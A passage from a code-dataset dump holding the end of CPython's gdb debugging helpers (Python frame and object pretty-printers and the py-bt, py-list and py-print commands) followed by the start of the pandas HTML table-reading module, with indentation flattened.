return self.f_lineno
else:
#try:
return self.co.addr2line(self.f_lasti)
#except ValueError:
# return self.f_lineno
def current_line(self):
'''Get the text of the current source line as a string, with a trailing
newline character'''
if self.is_optimized_out():
return '(frame information optimized out)'
filename = self.filename()
try:
f = open(os_fsencode(filename), 'r')
except IOError:
return None
with f:
all_lines = f.readlines()
# Convert from 1-based current_line_num to 0-based list offset:
return all_lines[self.current_line_num()-1]
def write_repr(self, out, visited):
if self.is_optimized_out():
out.write('(frame information optimized out)')
return
out.write('Frame 0x%x, for file %s, line %i, in %s ('
% (self.as_address(),
self.co_filename.proxyval(visited),
self.current_line_num(),
self.co_name.proxyval(visited)))
first = True
for pyop_name, pyop_value in self.iter_locals():
if not first:
out.write(', ')
first = False
out.write(pyop_name.proxyval(visited))
out.write('=')
pyop_value.write_repr(out, visited)
out.write(')')
def print_traceback(self):
if self.is_optimized_out():
sys.stdout.write(' (frame information optimized out)\n')
return
visited = set()
sys.stdout.write(' File "%s", line %i, in %s\n'
% (self.co_filename.proxyval(visited),
self.current_line_num(),
self.co_name.proxyval(visited)))
class PySetObjectPtr(PyObjectPtr):
_typename = 'PySetObject'
@classmethod
def _dummy_key(self):
return gdb.lookup_global_symbol('_PySet_Dummy').value()
def __iter__(self):
dummy_ptr = self._dummy_key()
table = self.field('table')
for i in safe_range(self.field('mask') + 1):
setentry = table[i]
key = setentry['key']
if key != 0 and key != dummy_ptr:
yield PyObjectPtr.from_pyobject_ptr(key)
def proxyval(self, visited):
# Guard against infinite loops:
if self.as_address() in visited:
return ProxyAlreadyVisited('%s(...)' % self.safe_tp_name())
visited.add(self.as_address())
members = (key.proxyval(visited) for key in self)
if self.safe_tp_name() == 'frozenset':
return frozenset(members)
else:
return set(members)
def write_repr(self, out, visited):
# Emulate Python 3's set_repr
tp_name = self.safe_tp_name()
# Guard against infinite loops:
if self.as_address() in visited:
out.write('(...)')
return
visited.add(self.as_address())
# Python 3's set_repr special-cases the empty set:
if not self.field('used'):
out.write(tp_name)
out.write('()')
return
# Python 3 uses {} for set literals:
if tp_name != 'set':
out.write(tp_name)
out.write('(')
out.write('{')
first = True
for key in self:
if not first:
out.write(', ')
first = False
key.write_repr(out, visited)
out.write('}')
if tp_name != 'set':
out.write(')')
class PyBytesObjectPtr(PyObjectPtr):
_typename = 'PyBytesObject'
def __str__(self):
field_ob_size = self.field('ob_size')
field_ob_sval = self.field('ob_sval')
char_ptr = field_ob_sval.address.cast(_type_unsigned_char_ptr())
return ''.join([chr(char_ptr[i]) for i in safe_range(field_ob_size)])
def proxyval(self, visited):
return str(self)
def write_repr(self, out, visited):
# Write this out as a Python 3 bytes literal, i.e. with a "b" prefix
# Get a PyStringObject* within the Python 2 gdb process:
proxy = self.proxyval(visited)
# Transliteration of Python 3's Objects/bytesobject.c:PyBytes_Repr
# to Python 2 code:
quote = "'"
if "'" in proxy and not '"' in proxy:
quote = '"'
out.write('b')
out.write(quote)
for byte in proxy:
if byte == quote or byte == '\\':
out.write('\\')
out.write(byte)
elif byte == '\t':
out.write('\\t')
elif byte == '\n':
out.write('\\n')
elif byte == '\r':
out.write('\\r')
elif byte < ' ' or ord(byte) >= 0x7f:
out.write('\\x')
out.write(hexdigits[(ord(byte) & 0xf0) >> 4])
out.write(hexdigits[ord(byte) & 0xf])
else:
out.write(byte)
out.write(quote)
class PyTupleObjectPtr(PyObjectPtr):
_typename = 'PyTupleObject'
def __getitem__(self, i):
# Get the gdb.Value for the (PyObject*) with the given index:
field_ob_item = self.field('ob_item')
return field_ob_item[i]
def proxyval(self, visited):
# Guard against infinite loops:
if self.as_address() in visited:
return ProxyAlreadyVisited('(...)')
visited.add(self.as_address())
result = tuple(PyObjectPtr.from_pyobject_ptr(self[i]).proxyval(visited)
for i in safe_range(int_from_int(self.field('ob_size'))))
return result
def write_repr(self, out, visited):
# Guard against infinite loops:
if self.as_address() in visited:
out.write('(...)')
return
visited.add(self.as_address())
out.write('(')
for i in safe_range(int_from_int(self.field('ob_size'))):
if i > 0:
out.write(', ')
element = PyObjectPtr.from_pyobject_ptr(self[i])
element.write_repr(out, visited)
if self.field('ob_size') == 1:
out.write(',)')
else:
out.write(')')
class PyTypeObjectPtr(PyObjectPtr):
_typename = 'PyTypeObject'
def _unichr_is_printable(char):
# Logic adapted from Python 3's Tools/unicode/makeunicodedata.py
if char == u" ":
return True
import unicodedata
return unicodedata.category(char) not in ("C", "Z")
if sys.maxunicode >= 0x10000:
_unichr = unichr
else:
# Needed for proper surrogate support if sizeof(Py_UNICODE) is 2 in gdb
def _unichr(x):
if x < 0x10000:
return unichr(x)
x -= 0x10000
ch1 = 0xD800 | (x >> 10)
ch2 = 0xDC00 | (x & 0x3FF)
return unichr(ch1) + unichr(ch2)
class PyUnicodeObjectPtr(PyObjectPtr):
_typename = 'PyUnicodeObject'
def char_width(self):
_type_Py_UNICODE = gdb.lookup_type('Py_UNICODE')
return _type_Py_UNICODE.sizeof
def proxyval(self, visited):
global _is_pep393
if _is_pep393 is None:
fields = gdb.lookup_type('PyUnicodeObject').target().fields()
_is_pep393 = 'data' in [f.name for f in fields]
if _is_pep393:
# Python 3.3 and newer
may_have_surrogates = False
compact = self.field('_base')
ascii = compact['_base']
state = ascii['state']
is_compact_ascii = (int(state['ascii']) and int(state['compact']))
if not int(state['ready']):
# string is not ready
field_length = long(compact['wstr_length'])
may_have_surrogates = True
field_str = ascii['wstr']
else:
field_length = long(ascii['length'])
if is_compact_ascii:
field_str = ascii.address + 1
elif int(state['compact']):
field_str = compact.address + 1
else:
field_str = self.field('data')['any']
repr_kind = int(state['kind'])
if repr_kind == 1:
field_str = field_str.cast(_type_unsigned_char_ptr())
elif repr_kind == 2:
field_str = field_str.cast(_type_unsigned_short_ptr())
elif repr_kind == 4:
field_str = field_str.cast(_type_unsigned_int_ptr())
else:
# Python 3.2 and earlier
field_length = long(self.field('length'))
field_str = self.field('str')
may_have_surrogates = self.char_width() == 2
# Gather a list of ints from the Py_UNICODE array; these are either
# UCS-1, UCS-2 or UCS-4 code points:
if not may_have_surrogates:
Py_UNICODEs = [int(field_str[i]) for i in safe_range(field_length)]
else:
# A more elaborate routine if sizeof(Py_UNICODE) is 2 in the
# inferior process: we must join surrogate pairs.
Py_UNICODEs = []
i = 0
limit = safety_limit(field_length)
while i < limit:
ucs = int(field_str[i])
i += 1
if ucs < 0xD800 or ucs >= 0xDC00 or i == field_length:
Py_UNICODEs.append(ucs)
continue
# This could be a surrogate pair.
ucs2 = int(field_str[i])
if ucs2 < 0xDC00 or ucs2 > 0xDFFF:
continue
code = (ucs & 0x03FF) << 10
code |= ucs2 & 0x03FF
code += 0x00010000
Py_UNICODEs.append(code)
i += 1
# Convert the int code points to unicode characters, and generate a
# local unicode instance.
# This splits surrogate pairs if sizeof(Py_UNICODE) is 2 here (in gdb).
result = u''.join([
(_unichr(ucs) if ucs <= 0x10ffff else '\ufffd')
for ucs in Py_UNICODEs])
return result
def write_repr(self, out, visited):
# Write this out as a Python 3 str literal, i.e. without a "u" prefix
# Get a PyUnicodeObject* within the Python 2 gdb process:
proxy = self.proxyval(visited)
# Transliteration of Python 3's Object/unicodeobject.c:unicode_repr
# to Python 2:
if "'" in proxy and '"' not in proxy:
quote = '"'
else:
quote = "'"
out.write(quote)
i = 0
while i < len(proxy):
ch = proxy[i]
i += 1
# Escape quotes and backslashes
if ch == quote or ch == '\\':
out.write('\\')
out.write(ch)
# Map special whitespace to '\t', \n', '\r'
elif ch == '\t':
out.write('\\t')
elif ch == '\n':
out.write('\\n')
elif ch == '\r':
out.write('\\r')
# Map non-printable US ASCII to '\xhh' */
elif ch < ' ' or ch == 0x7F:
out.write('\\x')
out.write(hexdigits[(ord(ch) >> 4) & 0x000F])
out.write(hexdigits[ord(ch) & 0x000F])
# Copy ASCII characters as-is
elif ord(ch) < 0x7F:
out.write(ch)
# Non-ASCII characters
else:
ucs = ch
ch2 = None
if sys.maxunicode < 0x10000:
# If sizeof(Py_UNICODE) is 2 here (in gdb), join
# surrogate pairs before calling _unichr_is_printable.
if (i < len(proxy)
and 0xD800 <= ord(ch) < 0xDC00 \
and 0xDC00 <= ord(proxy[i]) <= 0xDFFF):
ch2 = proxy[i]
ucs = ch + ch2
i += 1
# Unfortuately, Python 2's unicode type doesn't seem
# to expose the "isprintable" method
printable = _unichr_is_printable(ucs)
if printable:
try:
ucs.encode(ENCODING)
except UnicodeEncodeError:
printable = False
# Map Unicode whitespace and control characters
# (categories Z* and C* except ASCII space)
if not printable:
if ch2 is not None:
# Match Python 3's representation of non-printable
# wide characters.
code = (ord(ch) & 0x03FF) << 10
code |= ord(ch2) & 0x03FF
code += 0x00010000
else:
code = ord(ucs)
# Map 8-bit characters to '\\xhh'
if code <= 0xff:
out.write('\\x')
out.write(hexdigits[(code >> 4) & 0x000F])
out.write(hexdigits[code & 0x000F])
# Map 21-bit characters to '\U00xxxxxx'
elif code >= 0x10000:
out.write('\\U')
out.write(hexdigits[(code >> 28) & 0x0000000F])
out.write(hexdigits[(code >> 24) & 0x0000000F])
out.write(hexdigits[(code >> 20) & 0x0000000F])
out.write(hexdigits[(code >> 16) & 0x0000000F])
out.write(hexdigits[(code >> 12) & 0x0000000F])
out.write(hexdigits[(code >> 8) & 0x0000000F])
out.write(hexdigits[(code >> 4) & 0x0000000F])
out.write(hexdigits[code & 0x0000000F])
# Map 16-bit characters to '\uxxxx'
else:
out.write('\\u')
out.write(hexdigits[(code >> 12) & 0x000F])
out.write(hexdigits[(code >> 8) & 0x000F])
out.write(hexdigits[(code >> 4) & 0x000F])
out.write(hexdigits[code & 0x000F])
else:
# Copy characters as-is
out.write(ch)
if ch2 is not None:
out.write(ch2)
out.write(quote)
class wrapperobject(PyObjectPtr):
_typename = 'wrapperobject'
def safe_name(self):
try:
name = self.field('descr')['d_base']['name'].string()
return repr(name)
except (NullPyObjectPtr, RuntimeError):
return '<unknown name>'
def safe_tp_name(self):
try:
return self.field('self')['ob_type']['tp_name'].string()
except (NullPyObjectPtr, RuntimeError):
return '<unknown tp_name>'
def safe_self_addresss(self):
try:
address = long(self.field('self'))
return '%#x' % address
except (NullPyObjectPtr, RuntimeError):
return '<failed to get self address>'
def proxyval(self, visited):
name = self.safe_name()
tp_name = self.safe_tp_name()
self_address = self.safe_self_addresss()
return ("<method-wrapper %s of %s object at %s>"
% (name, tp_name, self_address))
def write_repr(self, out, visited):
proxy = self.proxyval(visited)
out.write(proxy)
def int_from_int(gdbval):
return int(str(gdbval))
def stringify(val):
# TODO: repr() puts everything on one line; pformat can be nicer, but
# can lead to v.long results; this function isolates the choice
if True:
return repr(val)
else:
from pprint import pformat
return pformat(val)
class PyObjectPtrPrinter:
"Prints a (PyObject*)"
def __init__ (self, gdbval):
self.gdbval = gdbval
def to_string (self):
pyop = PyObjectPtr.from_pyobject_ptr(self.gdbval)
if True:
return pyop.get_truncated_repr(MAX_OUTPUT_LEN)
else:
# Generate full proxy value then stringify it.
# Doing so could be expensive
proxyval = pyop.proxyval(set())
return stringify(proxyval)
def pretty_printer_lookup(gdbval):
type = gdbval.type.unqualified()
if type.code != gdb.TYPE_CODE_PTR:
return None
type = type.target().unqualified()
t = str(type)
if t in ("PyObject", "PyFrameObject", "PyUnicodeObject", "wrapperobject"):
return PyObjectPtrPrinter(gdbval)
"""
During development, I've been manually invoking the code in this way:
(gdb) python
import sys
sys.path.append('/home/david/coding/python-gdb')
import libpython
end
then reloading it after each edit like this:
(gdb) python reload(libpython)
The following code should ensure that the prettyprinter is registered
if the code is autoloaded by gdb when visiting libpython.so, provided
that this python file is installed to the same path as the library (or its
.debug file) plus a "-gdb.py" suffix, e.g:
/usr/lib/libpython2.6.so.1.0-gdb.py
/usr/lib/debug/usr/lib/libpython2.6.so.1.0.debug-gdb.py
"""
def register (obj):
if obj is None:
obj = gdb
# Wire up the pretty-printer
obj.pretty_printers.append(pretty_printer_lookup)
register (gdb.current_objfile ())
# Unfortunately, the exact API exposed by the gdb module varies somewhat
# from build to build
# See http://bugs.python.org/issue8279?#msg102276
class Frame(object):
'''
Wrapper for gdb.Frame, adding various methods
'''
def __init__(self, gdbframe):
self._gdbframe = gdbframe
def older(self):
older = self._gdbframe.older()
if older:
return Frame(older)
else:
return None
def newer(self):
newer = self._gdbframe.newer()
if newer:
return Frame(newer)
else:
return None
def select(self):
'''If supported, select this frame and return True; return False if unsupported
Not all builds have a gdb.Frame.select method; seems to be present on Fedora 12
onwards, but absent on Ubuntu buildbot'''
if not hasattr(self._gdbframe, 'select'):
print ('Unable to select frame: '
'this build of gdb does not expose a gdb.Frame.select method')
return False
self._gdbframe.select()
return True
def get_index(self):
'''Calculate index of frame, starting at 0 for the newest frame within
this thread'''
index = 0
# Go down until you reach the newest frame:
iter_frame = self
while iter_frame.newer():
index += 1
iter_frame = iter_frame.newer()
return index
# We divide frames into:
# - "python frames":
# - "bytecode frames" i.e. PyEval_EvalFrameEx
# - "other python frames": things that are of interest from a python
# POV, but aren't bytecode (e.g. GC, GIL)
# - everything else
def is_python_frame(self):
'''Is this a _PyEval_EvalFrameDefault frame, or some other important
frame? (see is_other_python_frame for what "important" means in this
context)'''
if self.is_evalframe():
return True
if self.is_other_python_frame():
return True
return False
def is_evalframe(self):
'''Is this a _PyEval_EvalFrameDefault frame?'''
if self._gdbframe.name() == EVALFRAME:
'''
I believe we also need to filter on the inline
struct frame_id.inline_depth, only regarding frames with
an inline depth of 0 as actually being this function
So we reject those with type gdb.INLINE_FRAME
'''
if self._gdbframe.type() == gdb.NORMAL_FRAME:
# We have a _PyEval_EvalFrameDefault frame:
return True
return False
def is_other_python_frame(self):
'''Is this frame worth displaying in python backtraces?
Examples:
- waiting on the GIL
- garbage-collecting
- within a CFunction
If it is, return a descriptive string
For other frames, return False
'''
if self.is_waiting_for_gil():
return 'Waiting for the GIL'
if self.is_gc_collect():
return 'Garbage-collecting'
# Detect invocations of PyCFunction instances:
frame = self._gdbframe
caller = frame.name()
if not caller:
return False
if caller in ('_PyCFunction_FastCallDict',
'_PyCFunction_FastCallKeywords'):
arg_name = 'func'
# Within that frame:
# "func" is the local containing the PyObject* of the
# PyCFunctionObject instance
# "f" is the same value, but cast to (PyCFunctionObject*)
# "self" is the (PyObject*) of the 'self'
try:
# Use the prettyprinter for the func:
func = frame.read_var(arg_name)
return str(func)
except RuntimeError:
return 'PyCFunction invocation (unable to read %s)' % arg_name
if caller == 'wrapper_call':
try:
func = frame.read_var('wp')
return str(func)
except RuntimeError:
return '<wrapper_call invocation>'
# This frame isn't worth reporting:
return False
def is_waiting_for_gil(self):
'''Is this frame waiting on the GIL?'''
# This assumes the _POSIX_THREADS version of Python/ceval_gil.h:
name = self._gdbframe.name()
if name:
return 'pthread_cond_timedwait' in name
def is_gc_collect(self):
'''Is this frame "collect" within the garbage-collector?'''
return self._gdbframe.name() == 'collect'
def get_pyop(self):
try:
f = self._gdbframe.read_var('f')
frame = PyFrameObjectPtr.from_pyobject_ptr(f)
if not frame.is_optimized_out():
return frame
# gdb is unable to get the "f" argument of PyEval_EvalFrameEx()
# because it was "optimized out". Try to get "f" from the frame
# of the caller, PyEval_EvalCodeEx().
orig_frame = frame
caller = self._gdbframe.older()
if caller:
f = caller.read_var('f')
frame = PyFrameObjectPtr.from_pyobject_ptr(f)
if not frame.is_optimized_out():
return frame
return orig_frame
except ValueError:
return None
@classmethod
def get_selected_frame(cls):
_gdbframe = gdb.selected_frame()
if _gdbframe:
return Frame(_gdbframe)
return None
@classmethod
def get_selected_python_frame(cls):
'''Try to obtain the Frame for the python-related code in the selected
frame, or None'''
try:
frame = cls.get_selected_frame()
except gdb.error:
# No frame: Python didn't start yet
return None
while frame:
if frame.is_python_frame():
return frame
frame = frame.older()
# Not found:
return None
@classmethod
def get_selected_bytecode_frame(cls):
'''Try to obtain the Frame for the python bytecode interpreter in the
selected GDB frame, or None'''
frame = cls.get_selected_frame()
while frame:
if frame.is_evalframe():
return frame
frame = frame.older()
# Not found:
return None
def print_summary(self):
if self.is_evalframe():
pyop = self.get_pyop()
if pyop:
line = pyop.get_truncated_repr(MAX_OUTPUT_LEN)
write_unicode(sys.stdout, '#%i %s\n' % (self.get_index(), line))
if not pyop.is_optimized_out():
line = pyop.current_line()
if line is not None:
sys.stdout.write(' %s\n' % line.strip())
else:
sys.stdout.write('#%i (unable to read python frame information)\n' % self.get_index())
else:
info = self.is_other_python_frame()
if info:
sys.stdout.write('#%i %s\n' % (self.get_index(), info))
else:
sys.stdout.write('#%i\n' % self.get_index())
def print_traceback(self):
if self.is_evalframe():
pyop = self.get_pyop()
if pyop:
pyop.print_traceback()
if not pyop.is_optimized_out():
line = pyop.current_line()
if line is not None:
sys.stdout.write(' %s\n' % line.strip())
else:
sys.stdout.write(' (unable to read python frame information)\n')
else:
info = self.is_other_python_frame()
if info:
sys.stdout.write(' %s\n' % info)
else:
sys.stdout.write(' (not a python frame)\n')
class PyList(gdb.Command):
'''List the current Python source code, if any
Use
py-list START
to list at a different line number within the python source.
Use
py-list START, END
to list a specific range of lines within the python source.
'''
def __init__(self):
gdb.Command.__init__ (self,
"py-list",
gdb.COMMAND_FILES,
gdb.COMPLETE_NONE)
def invoke(self, args, from_tty):
import re
start = None
end = None
m = re.match(r'\s*(\d+)\s*', args)
if m:
start = int(m.group(0))
end = start + 10
m = re.match(r'\s*(\d+)\s*,\s*(\d+)\s*', args)
if m:
start, end = map(int, m.groups())
# py-list requires an actual PyEval_EvalFrameEx frame:
frame = Frame.get_selected_bytecode_frame()
if not frame:
print('Unable to locate gdb frame for python bytecode interpreter')
return
pyop = frame.get_pyop()
if not pyop or pyop.is_optimized_out():
print('Unable to read information on python frame')
return
filename = pyop.filename()
lineno = pyop.current_line_num()
if start is None:
start = lineno - 5
end = lineno + 5
if start<1:
start = 1
try:
f = open(os_fsencode(filename), 'r')
except IOError as err:
sys.stdout.write('Unable to open %s: %s\n'
% (filename, err))
return
with f:
all_lines = f.readlines()
# start and end are 1-based, all_lines is 0-based;
# so [start-1:end] as a python slice gives us [start, end] as a
# closed interval
for i, line in enumerate(all_lines[start-1:end]):
linestr = str(i+start)
# Highlight current line:
if i + start == lineno:
linestr = '>' + linestr
sys.stdout.write('%4s %s' % (linestr, line))
# ...and register the command:
PyList()
def move_in_stack(move_up):
'''Move up or down the stack (for the py-up/py-down command)'''
frame = Frame.get_selected_python_frame()
if not frame:
print('Unable to locate python frame')
return
while frame:
if move_up:
iter_frame = frame.older()
else:
iter_frame = frame.newer()
if not iter_frame:
break
if iter_frame.is_python_frame():
# Result:
if iter_frame.select():
iter_frame.print_summary()
return
frame = iter_frame
if move_up:
print('Unable to find an older python frame')
else:
print('Unable to find a newer python frame')
class PyUp(gdb.Command):
'Select and print the python stack frame that called this one (if any)'
def __init__(self):
gdb.Command.__init__ (self,
"py-up",
gdb.COMMAND_STACK,
gdb.COMPLETE_NONE)
def invoke(self, args, from_tty):
move_in_stack(move_up=True)
class PyDown(gdb.Command):
'Select and print the python stack frame called by this one (if any)'
def __init__(self):
gdb.Command.__init__ (self,
"py-down",
gdb.COMMAND_STACK,
gdb.COMPLETE_NONE)
def invoke(self, args, from_tty):
move_in_stack(move_up=False)
# Not all builds of gdb have gdb.Frame.select
if hasattr(gdb.Frame, 'select'):
PyUp()
PyDown()
class PyBacktraceFull(gdb.Command):
'Display the current python frame and all the frames within its call stack (if any)'
def __init__(self):
gdb.Command.__init__ (self,
"py-bt-full",
gdb.COMMAND_STACK,
gdb.COMPLETE_NONE)
def invoke(self, args, from_tty):
frame = Frame.get_selected_python_frame()
if not frame:
print('Unable to locate python frame')
return
while frame:
if frame.is_python_frame():
frame.print_summary()
frame = frame.older()
PyBacktraceFull()
class PyBacktrace(gdb.Command):
'Display the current python frame and all the frames within its call stack (if any)'
def __init__(self):
gdb.Command.__init__ (self,
"py-bt",
gdb.COMMAND_STACK,
gdb.COMPLETE_NONE)
def invoke(self, args, from_tty):
frame = Frame.get_selected_python_frame()
if not frame:
print('Unable to locate python frame')
return
sys.stdout.write('Traceback (most recent call first):\n')
while frame:
if frame.is_python_frame():
frame.print_traceback()
frame = frame.older()
PyBacktrace()
class PyPrint(gdb.Command):
'Look up the given python variable name, and print it'
def __init__(self):
gdb.Command.__init__ (self,
"py-print",
gdb.COMMAND_DATA,
gdb.COMPLETE_NONE)
def invoke(self, args, from_tty):
name = str(args)
frame = Frame.get_selected_python_frame()
if not frame:
print('Unable to locate python frame')
return
pyop_frame = frame.get_pyop()
if not pyop_frame:
print('Unable to read information on python frame')
return
pyop_var, scope = pyop_frame.get_var_by_name(name)
if pyop_var:
print('%s %r = %s'
% (scope,
name,
pyop_var.get_truncated_repr(MAX_OUTPUT_LEN)))
else:
print('%r not found' % name)
PyPrint()
class PyLocals(gdb.Command):
'Look up the given python variable name, and print it'
def __init__(self):
gdb.Command.__init__ (self,
"py-locals",
gdb.COMMAND_DATA,
gdb.COMPLETE_NONE)
def invoke(self, args, from_tty):
name = str(args)
frame = Frame.get_selected_python_frame()
if not frame:
print('Unable to locate python frame')
return
pyop_frame = frame.get_pyop()
if not pyop_frame:
print('Unable to read information on python frame')
return
for pyop_name, pyop_value in pyop_frame.iter_locals():
print('%s = %s'
% (pyop_name.proxyval(set()),
pyop_value.get_truncated_repr(MAX_OUTPUT_LEN)))
PyLocals()
|
py | 7df7cc3326c7748e772bf396dd87e4e776843413 | """:mod:`pandas.io.html` is a module containing functionality for dealing with
HTML IO.
"""
from distutils.version import LooseVersion
import numbers
import os
import re
import pandas.compat as compat
from pandas.compat import (
binary_type, iteritems, lmap, lrange, raise_with_traceback, string_types)
from pandas.errors import AbstractMethodError, EmptyDataError
from pandas.core.dtypes.common import is_list_like
from pandas import Series
from pandas.io.common import _is_url, _validate_header_arg, urlopen
from pandas.io.formats.printing import pprint_thing
from pandas.io.parsers import TextParser
_IMPORTS = False
_HAS_BS4 = False
_HAS_LXML = False
_HAS_HTML5LIB = False
def _importers():
# import things we need
# but make this done on a first use basis
global _IMPORTS
if _IMPORTS:
return
global _HAS_BS4, _HAS_LXML, _HAS_HTML5LIB
try:
import bs4 # noqa
_HAS_BS4 = True
except ImportError:
pass
try:
import lxml # noqa
_HAS_LXML = True
except ImportError:
pass
try:
import html5lib # noqa
_HAS_HTML5LIB = True
except ImportError:
pass
_IMPORTS = True
#############
# READ HTML #
#############
_RE_WHITESPACE = re.compile(r'[\r\n]+|\s{2,}')
char_types = string_types + (binary_type,)
def _remove_whitespace(s, regex=_RE_WHITESPACE):
"""Replace extra whitespace inside of a string with a single space.
Parameters
----------
s : str or unicode
The string from which to remove extra whitespace.
regex : regex
The regular expression to use to remove extra whitespace.
Returns
-------
subd : str or unicode
`s` with all extra whitespace replaced with a single space.
"""
return regex.sub(' ', s.strip())
def _get_skiprows(skiprows):
"""Get an iterator given an integer, slice or container.
Parameters
----------
skiprows : int, slice, container
The iterator to use to skip rows; can also be a slice.
Raises
------
TypeError
* If `skiprows` is not a slice, integer, or Container
Returns
-------
it : iterable
A proper iterator to use to skip rows of a DataFrame.
"""
if isinstance(skiprows, slice):
return lrange(skiprows.start or 0, skiprows.stop, skiprows.step or 1)
elif isinstance(skiprows, numbers.Integral) or is_list_like(skiprows):
return skiprows
elif skiprows is None:
return 0
raise TypeError('%r is not a valid type for skipping rows' %
type(skiprows).__name__)
def _read(obj):
"""Try to read from a url, file or string.
Parameters
----------
obj : str, unicode, or file-like
Returns
-------
raw_text : str
"""
if _is_url(obj):
with urlopen(obj) as url:
text = url.read()
elif hasattr(obj, 'read'):
text = obj.read()
elif isinstance(obj, char_types):
text = obj
try:
if os.path.isfile(text):
with open(text, 'rb') as f:
return f.read()
except (TypeError, ValueError):
pass
else:
raise TypeError("Cannot read object of type %r" % type(obj).__name__)
return text
class _HtmlFrameParser(object):
"""Base class for parsers that parse HTML into DataFrames.
Parameters
----------
io : str or file-like
This can be either a string of raw HTML, a valid URL using the HTTP,
FTP, or FILE protocols or a file-like object.
match : str or regex
The text to match in the document.
attrs : dict
List of HTML <table> element attributes to match.
encoding : str
Encoding to be used by parser
displayed_only : bool
Whether or not items with "display:none" should be ignored
.. versionadded:: 0.23.0
Attributes
----------
io : str or file-like
raw HTML, URL, or file-like object
match : regex
The text to match in the raw HTML
attrs : dict-like
A dictionary of valid table attributes to use to search for table
elements.
encoding : str
Encoding to be used by parser
displayed_only : bool
Whether or not items with "display:none" should be ignored
.. versionadded:: 0.23.0
Notes
-----
To subclass this class effectively you must override the following methods:
* :func:`_build_doc`
* :func:`_attr_getter`
* :func:`_text_getter`
* :func:`_parse_td`
* :func:`_parse_thead_tr`
* :func:`_parse_tbody_tr`
* :func:`_parse_tfoot_tr`
* :func:`_parse_tables`
* :func:`_equals_tag`
See each method's respective documentation for details on their
functionality.
"""
def __init__(self, io, match, attrs, encoding, displayed_only):
self.io = io
self.match = match
self.attrs = attrs
self.encoding = encoding
self.displayed_only = displayed_only
def parse_tables(self):
"""
Parse and return all tables from the DOM.
Returns
-------
list of parsed (header, body, footer) tuples from tables.
"""
tables = self._parse_tables(self._build_doc(), self.match, self.attrs)
return (self._parse_thead_tbody_tfoot(table) for table in tables)
def _attr_getter(self, obj, attr):
"""
Return the attribute value of an individual DOM node.
Parameters
----------
obj : node-like
A DOM node.
attr : str or unicode
The attribute, such as "colspan"
Returns
-------
str or unicode
The attribute value.
"""
# Both lxml and BeautifulSoup have the same implementation:
return obj.get(attr)
def _text_getter(self, obj):
"""
Return the text of an individual DOM node.
Parameters
----------
obj : node-like
A DOM node.
Returns
-------
text : str or unicode
The text from an individual DOM node.
"""
raise AbstractMethodError(self)
def _parse_td(self, obj):
"""Return the td elements from a row element.
Parameters
----------
obj : node-like
A DOM <tr> node.
Returns
-------
list of node-like
These are the elements of each row, i.e., the columns.
"""
raise AbstractMethodError(self)
def _parse_thead_tr(self, table):
"""
Return the list of thead row elements from the parsed table element.
Parameters
----------
table : a table element that contains zero or more thead elements.
Returns
-------
list of node-like
These are the <tr> row elements of a table.
"""
raise AbstractMethodError(self)
def _parse_tbody_tr(self, table):
"""
Return the list of tbody row elements from the parsed table element.
HTML5 table bodies consist of either 0 or more <tbody> elements (which
only contain <tr> elements) or 0 or more <tr> elements. This method
checks for both structures.
Parameters
----------
table : a table element that contains row elements.
Returns
-------
list of node-like
These are the <tr> row elements of a table.
"""
raise AbstractMethodError(self)
def _parse_tfoot_tr(self, table):
"""
Return the list of tfoot row elements from the parsed table element.
Parameters
----------
table : a table element that contains row elements.
Returns
-------
list of node-like
These are the <tr> row elements of a table.
"""
raise AbstractMethodError(self)
def _parse_tables(self, doc, match, attrs):
"""
Return all tables from the parsed DOM.
Parameters
----------
doc : the DOM from which to parse the table element.
match : str or regular expression
The text to search for in the DOM tree.
attrs : dict
A dictionary of table attributes that can be used to disambiguate
multiple tables on a page.
Raises
------
ValueError : `match` does not match any text in the document.
Returns
-------
list of node-like
HTML <table> elements to be parsed into raw data.
"""
raise AbstractMethodError(self)
def _equals_tag(self, obj, tag):
"""
Return whether an individual DOM node matches a tag
Parameters
----------
obj : node-like
A DOM node.
tag : str
Tag name to be checked for equality.
Returns
-------
boolean
Whether `obj`'s tag name is `tag`
"""
raise AbstractMethodError(self)
def _build_doc(self):
"""
Return a tree-like object that can be used to iterate over the DOM.
Returns
-------
node-like
The DOM from which to parse the table element.
"""
raise AbstractMethodError(self)
def _parse_thead_tbody_tfoot(self, table_html):
"""
Given a table, return parsed header, body, and foot.
Parameters
----------
table_html : node-like
Returns
-------
tuple of (header, body, footer), each a list of list-of-text rows.
Notes
-----
Header and body are lists-of-lists. Top level list is a list of
rows. Each row is a list of str text.
Logic: Use <thead>, <tbody>, <tfoot> elements to identify
header, body, and footer, otherwise:
- Put all rows into body
- Move rows from top of body to header only if
all elements inside row are <th>
- Move rows from bottom of body to footer only if
all elements inside row are <th>
"""
header_rows = self._parse_thead_tr(table_html)
body_rows = self._parse_tbody_tr(table_html)
footer_rows = self._parse_tfoot_tr(table_html)
def row_is_all_th(row):
return all(self._equals_tag(t, 'th') for t in
self._parse_td(row))
if not header_rows:
# The table has no <thead>. Move the top all-<th> rows from
# body_rows to header_rows. (This is a common case because many
# tables in the wild have no <thead> or <tfoot>
while body_rows and row_is_all_th(body_rows[0]):
header_rows.append(body_rows.pop(0))
header = self._expand_colspan_rowspan(header_rows)
body = self._expand_colspan_rowspan(body_rows)
footer = self._expand_colspan_rowspan(footer_rows)
return header, body, footer
def _expand_colspan_rowspan(self, rows):
"""
Given a list of <tr>s, return a list of text rows.
Parameters
----------
rows : list of node-like
List of <tr>s
Returns
-------
list of list
Each returned row is a list of str text.
Notes
-----
Any cell with ``rowspan`` or ``colspan`` will have its contents copied
to subsequent cells.
"""
all_texts = [] # list of rows, each a list of str
remainder = [] # list of (index, text, nrows)
for tr in rows:
texts = [] # the output for this row
next_remainder = []
index = 0
tds = self._parse_td(tr)
for td in tds:
# Append texts from previous rows with rowspan>1 that come
# before this <td>
while remainder and remainder[0][0] <= index:
prev_i, prev_text, prev_rowspan = remainder.pop(0)
texts.append(prev_text)
if prev_rowspan > 1:
next_remainder.append((prev_i, prev_text,
prev_rowspan - 1))
index += 1
# Append the text from this <td>, colspan times
text = _remove_whitespace(self._text_getter(td))
rowspan = int(self._attr_getter(td, 'rowspan') or 1)
colspan = int(self._attr_getter(td, 'colspan') or 1)
for _ in range(colspan):
texts.append(text)
if rowspan > 1:
next_remainder.append((index, text, rowspan - 1))
index += 1
# Append texts from previous rows at the final position
for prev_i, prev_text, prev_rowspan in remainder:
texts.append(prev_text)
if prev_rowspan > 1:
next_remainder.append((prev_i, prev_text,
prev_rowspan - 1))
all_texts.append(texts)
remainder = next_remainder
# Append rows that only appear because the previous row had non-1
# rowspan
